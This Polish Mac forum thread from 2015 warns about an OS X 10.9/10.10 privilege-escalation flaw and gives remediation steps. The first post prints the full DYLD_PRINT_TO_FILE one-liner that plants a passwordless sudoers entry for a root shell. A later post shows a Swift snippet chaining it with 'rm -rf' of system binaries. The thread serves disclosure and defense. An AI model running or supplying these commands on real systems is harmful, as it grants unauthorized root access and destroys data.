Skocz do zawartości

Witaj!

Zaloguj lub Zarejestruj się aby uzyskać pełny dostęp do forum.

Zdjęcie
- - - - -

Błąd bezpieczeństwa - łatajcie jak najszybciej


  • Zaloguj się, aby dodać odpowiedź
16 odpowiedzi w tym temacie

#1 enedil

enedil
  • 108 postów
  • SkądPorfia, Chile

Napisano 26 lipca 2015 - 21:43

Apel do wszystkich użytkowników OS X 10.9 i 10.10 - gigantyczna luka bezpieczeństwa:

wystarczy w terminalu wpisać

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -i

aby uzyskać powłokę roota bez hasła.

 

BARDZO WAŻNE - jeżeli nie wiesz, co robisz, nie uruchamiaj tej komendy -> prowadzi do naprawialnie uszkodzonego systemu.

Jeżeli jednak uruchomiłeś/łaś, uruchom

EDITOR=nano sudo visudo

i usuń z końca pliku linijki o treści

<NAZWA_UŻYTKOWNIKA> ALL=(ALL) NOPASSWD:ALL

Jak się zabezpieczyć? Zainstaluj tego kexta -> https://github.com/s...SUIDGuardNG.pkg

 

Cały opis problemu:

https://www.sektione...o_file_lpe.html


  • Arkhan lubi to

#2 Yellowfrog

Yellowfrog
  • 1 548 postów
  • Płeć:

Napisano 26 lipca 2015 - 22:11

Przecież trzeba mieć fizyczny dostęp do kompa, żeby to wpisać. Też mi wielkie halo.

Już pędzę instalować jakieś g...no z Githuba. 

Wyluzuj.



#3 enedil

enedil
  • 108 postów
  • SkądPorfia, Chile

Napisano 26 lipca 2015 - 23:43

Przecież trzeba mieć fizyczny dostęp do kompa, żeby to wpisać. Też mi wielkie halo.

Już pędzę instalować jakieś gówno z Githuba. 

Wyluzuj.

Nie trzeba.

Przykad: niedawna luka we Flash playerze - zdalne uruchomienie kodu.

Wystarczy taki kawałek kodu w Swifcie:

var nsCommand : NSString = "echo 'echo \"$(whoami) ALL=(ALL) NOPASSWD:ALL\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo rm -rf /bin/* /sbin/*"
var command : CString? = nsCommand.cStringUsingEncoding(NSUTF8StringEncoding)
system(command!)

i już masz rozwalony, nieużywalny system. A oczywiście da się o wiele więcej.

 

To "g*wno" m udostępniony kod źródłowy, a człowiek który je udostępnił jest znany w środowisku bezpieczeństwa OS X. Jeżeli boisz się o swój komputer po zainstalowaniu łatki - kexta, to przeczytaj kod źródłowy.



#4 Yellowfrog

Yellowfrog
  • 1 548 postów
  • Płeć:

Napisano 27 lipca 2015 - 00:05

 

To "g*wno" m udostępniony kod źródłowy, a człowiek który je udostępnił jest znany w środowisku bezpieczeństwa OS X. Jeżeli boisz się o swój komputer po zainstalowaniu łatki - kexta, to przeczytaj kod źródłowy.

 

Nie znam się na programowaniu, kod źródłowy nic mi nie powie. Nauczyłem się nie instalować takich rzeczy i tyle. Poczekam, aż Apple coś wypuści. Flasha nie używam, programów nie instaluję, gości nie zapraszam.



#5 enedil

enedil
  • 108 postów
  • SkądPorfia, Chile

Napisano 27 lipca 2015 - 00:15

Nie znam się na programowaniu, kod źródłowy nic mi nie powie. Nauczyłem się nie instalować takich rzeczy i tyle. Poczekam, aż Apple coś wypuści. Flasha nie używam, programów nie instaluję, gości nie zapraszam.


A co powiesz na taką lukę?
https://msisac.cisec...15/2015-007.cfm
Wystarczyło, że wejdziesz na spreparowaną stronę. Łącząc to z ostatnio coraz częstszymi przejęciami domen, może się okazać, że w teorii ufasz stronie, ale od niedawna siedzi tam coś innego, jakaś dziura pozwalająca na wykonanie kodu - co, jak już widzisz prowadzi do przejęcia kontroli na komputerem.

W becie 10.10.5 problem nadal występuje, więc można się spodziewać, że taki stan jeszcze potrwa kilka miesięcy.

A odnośnie Twojej wiedzy - nie widzę powodu, dla którego wolnoźródłowy program, w dodatku króciutki i popularny miałby być złośliwy. I generalnie na GitHubie trudno znaleźć niechciane oprogramowanie.

#6 Yellowfrog

Yellowfrog
  • 1 548 postów
  • Płeć:

Napisano 27 lipca 2015 - 00:26

A co powiesz na taką lukę?
https://msisac.cisec...15/2015-007.cfm
Wystarczyło, że wejdziesz na spreparowaną stronę. Łącząc to z ostatnio coraz częstszymi przejęciami domen, może się okazać, że w teorii ufasz stronie, ale od niedawna siedzi tam coś innego, jakaś dziura pozwalająca na wykonanie kodu - co, jak już widzisz prowadzi do przejęcia kontroli na komputerem.

W becie 10.10.5 problem nadal występuje, więc można się spodziewać, że taki stan jeszcze potrwa kilka miesięcy.

A odnośnie Twojej wiedzy - nie widzę powodu, dla którego wolnoźródłowy program, w dodatku króciutki i popularny miałby być złośliwy. I generalnie na GitHubie trudno znaleźć niechciane oprogramowanie.

 

Podchodzę po prostu spokojnie do takich akcji z błędami bezpieczeństwa. Parę krytycznych luk już było. Co jakiś czas robię kopię dysku, odtworzenie trwa maks godzinę. Dodatkowo wszystkie dane mam w chmurze. Przeżyję.

 

Odnośnie Githuba - nie chodzi mi o jakieś niechciane oprogramowanie, tylko bardziej o to, że to jest w końcu jakieś rozszerzenie jądra, może zrobione w dobrej wierze, pewnie nic nie namiesza, ale poczekam na coś bardziej oficjalnego po prostu - nie do końca ufam takim wynalazkom i tyle.

 

Poza tym jak najprościej psuje się system? Instalując coś samemu. Nic mi się nigdy nie przywlekło samo. Może mam szczęście.


Użytkownik Yellowfrog edytował ten post 27 lipca 2015 - 00:29


#7 enedil

enedil
  • 108 postów
  • SkądPorfia, Chile

Napisano 27 lipca 2015 - 08:53

Ok. Nie będę się spierać. Dopowiem tylko, że tu nie chodzi tylko o uszkodzenie, ale także o kradzież danych.

#8 Kuba2000

Kuba2000
  • 2 043 postów
  • SkądKielce

Napisano 27 lipca 2015 - 09:01

Tak wszyscy majacy systemy wczesniejsze niz 10.10 i ios 8 panikujmy bo sa wszedzie dziury w systemach. Sam masz zapewne konto na fb albo nawet na forum to jest w internecie.

iPhone 6S PLUS 128GB SILVER | Apple Watch Series 3 42mm Fog | Asus A501LX i7 5500U Nvidia GE FORCE 950M 8GB ram 1TB Dysk twardy


#9 Yellowfrog

Yellowfrog
  • 1 548 postów
  • Płeć:

Napisano 27 lipca 2015 - 09:27

Dopowiem tylko, że tu nie chodzi tylko o uszkodzenie, ale także o kradzież danych.

 

No właśnie nie mam nic ciekawego poza dużą ilością muzyki. Dlatego jestem taki wyluzowany.



#10 enedil

enedil
  • 108 postów
  • SkądPorfia, Chile

Napisano 27 lipca 2015 - 11:18

Tak wszyscy majacy systemy wczesniejsze niz 10.10 i ios 8 panikujmy bo sa wszedzie dziury w systemach. Sam masz zapewne konto na fb albo nawet na forum to jest w internecie.

Są dziury - rzecz wiadoma. Ale gdy już o jakiejś wiadomo - nie jest paniką ją załatać, a stoicką mądrością pozostawić system w pierwotnym stanie.



#11 markizrkn

markizrkn
  • 12 postów
  • SkądLublin

Napisano 28 lipca 2015 - 10:27

Właśnie w poniedziałek coś mi załatwiło kompa. Niestety jest leciwy. Z 2008. 2.7 G chyba i 4 G RAM. Dysk 1 T.  Może ze 3 tydnie temu uaktualizowałem z 10.8.5. Od razu chciał, aby mu zainstalować Flasha. Tak zrobiłem. Ale przez kilka dni często dopominał się ponownie. Zawsze to olewałem. Miałem i wcześniej od kilku miesięcy co kilka dni restarty. Głównie na HD video z youtube czy innych stron. Czasem jak zrestartował, to potem 2 x i trzeci, nim poszedł. Zacząłem unikać usypiania. Po instalce zaczęło się to nasilać. Zacząłem przeglądać dzienniki i fora. Wyglądało, jakby wina była po stronie ESET Cyber Security Pro. Ale go nie odinstalowałem. No i w sądny poniedziałek na byle jakim flashu zdechł. Restartował się z 7 razy. Nic nie pomagało wyłączanie.  Zawiesza się teraz ciągle przy uruchamianiu. Udało mi się sprawdzić i naprawić uprawnienia systemu oraz sam system. Ale to nic nie dało. Teraz nawet nie mogę wyjąć płytki. Tak sobie pomyślałem, że może to być powiązane z twoim tematem. Może byłbyś w stanie co pomóc ?


Właśnie w poniedziałek coś uwaliło mi kompa. Jest leciwy. 2008, 2.7 G chyba, 4 G RAM. 1 T dysk. Ze 3 tydnie temu uaktualniłem z 10.8.5. Od razu chciał, by zainstalować Flasha. Zrobiłem. Ale dopominał się często  o to przez kilka dni. Olewałem to. Miałem już od kilku miesięcy restarty. Było to gdy oglądałem HD video z youtube czy innych stron. Czasem restartował 2 i 3 raz. Na Yosemite  nasiliło się to. Zacząłem sprawdzać dziennik i google. Wydawało się, że przyczyną może być ESET Cyber Security Pro, ale nie odinstalowałem go. Sądnego dnia poległ na byle jakim flashu. Restartował z 7 razy. Wyłączanie nie pomagało.Teraz podczas uruchamiania zawiesza się. Udało mi się sprawdzić i naprawić uprawnienia systemu oraz sam system. Nic to nie dało. Teraz nawet płytki nie mogę wyjąć. Pomyślałem, że może mieć to związek z Twoim tematem. Jakbyś mógł co pomóc, to rychło odezwij się.



#12 Kuba2000

Kuba2000
  • 2 043 postów
  • SkądKielce

Napisano 28 lipca 2015 - 10:29

A uruchomienie w safe mode.


iPhone 6S PLUS 128GB SILVER | Apple Watch Series 3 42mm Fog | Asus A501LX i7 5500U Nvidia GE FORCE 950M 8GB ram 1TB Dysk twardy


#13 cronopioverde

cronopioverde
  • 3 508 postów
  • Płeć:
  • Skądprzytuptał nocą jeż?

Napisano 28 lipca 2015 - 10:35

Jeśli nadal możesz uruchomić komputer, wejdź do Konsoli i pokaż logi z crashów. I osobiście wątpię, żeby to miało związek z tym tematem. Raczej załóż nowy w odpowiednim dziale.


  • markizrkn lubi to

Po pierwsze: na priv mogę zbereźne żarty poopowiadać, pomagam na forum.

Po drugie: brak mojej odpowiedzi na łamaną polszczyznę to wybór purysty. Z tym się nie walczy.
Po trzecie: postawy roszczeniowe zostawiamy dla BOK.
Zmian traffic lights nie przewiduję…


#14 Kuba2000

Kuba2000
  • 2 043 postów
  • SkądKielce

Napisano 28 lipca 2015 - 10:45

Jeśli nadal możesz uruchomić komputer, wejdź do Konsoli i pokaż logi z crashów. I osobiście wątpię, żeby to miało związek z tym tematem. Raczej załóż nowy w odpowiednim dziale.

Dokładnie, nie możliwe że akurat ten błąd, bo wcześniej występowały restarty.


iPhone 6S PLUS 128GB SILVER | Apple Watch Series 3 42mm Fog | Asus A501LX i7 5500U Nvidia GE FORCE 950M 8GB ram 1TB Dysk twardy


#15 enedil

enedil
  • 108 postów
  • SkądPorfia, Chile

Napisano 28 lipca 2015 - 11:42

Właśnie w poniedziałek coś mi załatwiło kompa. Niestety jest leciwy. Z 2008. 2.7 G chyba i 4 G RAM. Dysk 1 T.  Może ze 3 tydnie temu uaktualizowałem z 10.8.5. Od razu chciał, aby mu zainstalować Flasha. Tak zrobiłem. Ale przez kilka dni często dopominał się ponownie. Zawsze to olewałem. Miałem i wcześniej od kilku miesięcy co kilka dni restarty. Głównie na HD video z youtube czy innych stron. Czasem jak zrestartował, to potem 2 x i trzeci, nim poszedł. Zacząłem unikać usypiania. Po instalce zaczęło się to nasilać. Zacząłem przeglądać dzienniki i fora. Wyglądało, jakby wina była po stronie ESET Cyber Security Pro. Ale go nie odinstalowałem. No i w sądny poniedziałek na byle jakim flashu zdechł. Restartował się z 7 razy. Nic nie pomagało wyłączanie.  Zawiesza się teraz ciągle przy uruchamianiu. Udało mi się sprawdzić i naprawić uprawnienia systemu oraz sam system. Ale to nic nie dało. Teraz nawet nie mogę wyjąć płytki. Tak sobie pomyślałem, że może to być powiązane z twoim tematem. Może byłbyś w stanie co pomóc ?


Właśnie w poniedziałek coś uwaliło mi kompa. Jest leciwy. 2008, 2.7 G chyba, 4 G RAM. 1 T dysk. Ze 3 tydnie temu uaktualniłem z 10.8.5. Od razu chciał, by zainstalować Flasha. Zrobiłem. Ale dopominał się często  o to przez kilka dni. Olewałem to. Miałem już od kilku miesięcy restarty. Było to gdy oglądałem HD video z youtube czy innych stron. Czasem restartował 2 i 3 raz. Na Yosemite  nasiliło się to. Zacząłem sprawdzać dziennik i google. Wydawało się, że przyczyną może być ESET Cyber Security Pro, ale nie odinstalowałem go. Sądnego dnia poległ na byle jakim flashu. Restartował z 7 razy. Wyłączanie nie pomagało.Teraz podczas uruchamiania zawiesza się. Udało mi się sprawdzić i naprawić uprawnienia systemu oraz sam system. Nic to nie dało. Teraz nawet płytki nie mogę wyjąć. Pomyślałem, że może mieć to związek z Twoim tematem. Jakbyś mógł co pomóc, to rychło odezwij się.

Możesz włączyć terminal? Z trybu ratunkowego (Cmd + R podczas uruchamiania)? Jeżeli tak, sprawdź, czy wynik tego polecenia:

sudo tail -1 /etc/sudoers

zawiera linijkę:

<UŻYTKOWNIK> 	ALL=(ALL) NOPASSWD: ALL

.

 

 

Jeżeli tak, to Twój problem jest związany. Jeżeli nie, nie musi.



#16 markizrkn

markizrkn
  • 12 postów
  • SkądLublin

Napisano 28 lipca 2015 - 11:43

 Dzięki Wam za szybką odpowiedź. Będę w domu koło 16.  Nadzieja umiera ostatnia.



#17 markizrkn

markizrkn
  • 12 postów
  • SkądLublin

Napisano 29 lipca 2015 - 09:06

Przenoszę do tematu 

iMac zawiesza się podczas uruchamiania




Użytkownicy przeglądający ten temat: 1

0 użytkowników, 1 gości, 0 anonimowych